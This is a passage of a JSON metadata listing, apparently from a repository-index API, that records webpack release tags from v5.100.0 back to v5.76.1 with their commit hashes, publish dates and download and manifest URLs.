/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-